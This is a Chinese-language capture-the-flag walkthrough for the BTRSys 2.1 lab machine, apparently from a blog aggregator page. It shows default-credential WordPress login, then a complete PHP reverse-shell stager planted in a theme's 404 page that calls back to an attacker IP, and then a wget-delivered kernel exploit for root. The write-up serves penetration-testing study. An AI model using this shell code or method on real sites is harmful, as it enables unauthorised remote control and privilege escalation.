靶机-BTRSys 2.1 Walkthrough

BTRSys 2.1

https://www.vulnhub.com/entry/btrsys-v21,196/

参考：https://www.jianshu.com/p/9813095ce04d

提权辅助工具LinEnum下载：https://download.csdn.net/download/weixin_41082546/11609409
提权辅助工具linuxprivchecker下载：https://download.csdn.net/download/weixin_41082546/11609428

1.确定目标ip

2.端口和服务探测

根据vsftp版本没有找到相关漏洞利用代码

然后我们转战web

查看页面代码，前端源代码中也没有什么有意义的东西

nikto -h 192.168.88.199 发现在robots.txt 文件中存在 wordpress目录

http://192.168.88.199/robots.txt

http://192.168.88.199/wordpress/

http://192.168.88.199/wordpress/wp-login.php

找到后台管理界面直接默认账号admin、admin登录成功！

看了一下也没有安装什么插件，但是我们可以编辑页面，可以写个反弹shell进去，为了避免影响正常页面显示，我们可以将404页面内容替换为反弹shell内容。

<?php /**/ error_reporting(0); $ip = '192.168.88.174'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

服务端开启侦听

百度查看一下wordpress 的目录结构

需要关注这里，方便我们确认404页面的路径

192.168.88.199/wordpress/wp-content/themes/twentyfourteen/404.php

搜索内核相关漏洞利用代码

编译脚本并开启web服务

通过wget将编译好的漏洞利用程序下载到目标机器

修改权限为777并执行exploit，成功获得root权限。

靶机-BTRSys 2.1 Walkthrough的更多相关文章

靶机-SickOs 1.2 Walkthrough
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392. ...
OSCP Learning Notes - Capstone(2)
BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: ...
靶机-droopyCTF Walkthrough
droopyCTF https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm CTF镜像合集:https://www.vulnhu ...
11. CTF综合靶机渗透(四)
运行环境 Virtualbox (二选一) Vnware Workstation player 通关提示 Enumeration is key Try Harder Look in front of ...
AI:WEB:1 Walkthrough
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描浏 ...
BTRsys1~2系列靶机渗透
BTRsys系列靶机渗透 BTRsys1 端口发现加目录扫描. 发现目录:http://192.168.114.161/login.php 尝试弱密码失败,查看源代码. <script type ...
Walkthrough: Arranging Controls on Windows Forms Using Snaplines
https://msdn.microsoft.com/en-us/library/t5b5kc41(v=vs.110).aspx Spacing and Aligning Controls Using ...
Walkthrough: Creating and Using a Dynamic Link Library (C++)
Original Link: http://msdn.microsoft.com/zh-cn/library/ms235636.aspx Following content is only used ...
Burp Suite Walkthrough(英文版)
Burp Suite is one of the best tools available for web application testing. Its wide variety of featu ...

随机推荐

常用MouseEvent鼠标事件对象&KeyboardEvent键盘事件对象&常用键盘码
MouseEvent鼠标事件对象: e.target //=> 事件源(操作的是哪个元素) e.clientX e.clientY //当前鼠标触发点距离当前窗口左上角的X|Y轴坐标 e.pag ...
2018-2-13-win10-uwp-判断文件存在
title author date CreateTime categories win10 uwp 判断文件存在 lindexi 2018-2-13 17:23:3 +0800 2018-2-13 1 ...
<Catalan>杨辉三角实现卡特兰数计算方法
h(n)=C(2n,n)-C(2n,n-1) #include<cstdio> #define siz 20 using namespace std; int n; ][siz]; int ...
MySQL数据库性能优化：表、索引、SQL等
一.MySQL 数据库性能优化之SQL优化注:这篇文章是以 MySQL 为背景,很多内容同时适用于其他关系型数据库,需要有一些索引知识为基础优化目标减少 IO 次数IO永远是数据库最容易瓶颈的地 ...
tomcat 配置项目前缀（推荐方式四）
一. 显示配置 Context 的 path 需要在 server.xml 文件中手动配置. <Host name="localhost" appBase="w ...
美团面试官问我一个字符的String.length()是多少，我说是1，面试官说你回去好好学一下吧
本文首发于微信公众号:程序员乔戈里 public class testT { public static void main(String [] args){ String A = "hi你 ...
Spring Security详解
Spring Security 一. 简介 Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架.它提供了一组可以在Spring应用上下文 ...
开箱即用！使用Rancher 2.3 启用Istio初体验
本文来自Rancher Labs Rancher的理念是Run Kubernetes Everywhere,Rancher 2.3中许多重大更新,让这一理念的实现又向前一步. 其中,最重要的两个特性是 ...
Linux中du、df显示不一致问题
Linux中du.df显示不一致问题最近在做关于Q博士的项目的时候,用到了docker进行部署,对于后端服务可能会经常变动,于是将docker容器的jar包与宿主机目录下的jar包进行绑定,之后每次 ...
react路由的跳转和传参
1.路由的跳转一.DOM跳转在需要跳转的页面导入import {Link} from 'react-router-dom',在需要跳转的地方使用link标签的to属性进行跳转,路由配置文件中导出的 ...

靶机-BTRSys 2.1 Walkthrough

靶机-BTRSys 2.1 Walkthrough的更多相关文章

随机推荐

热门专题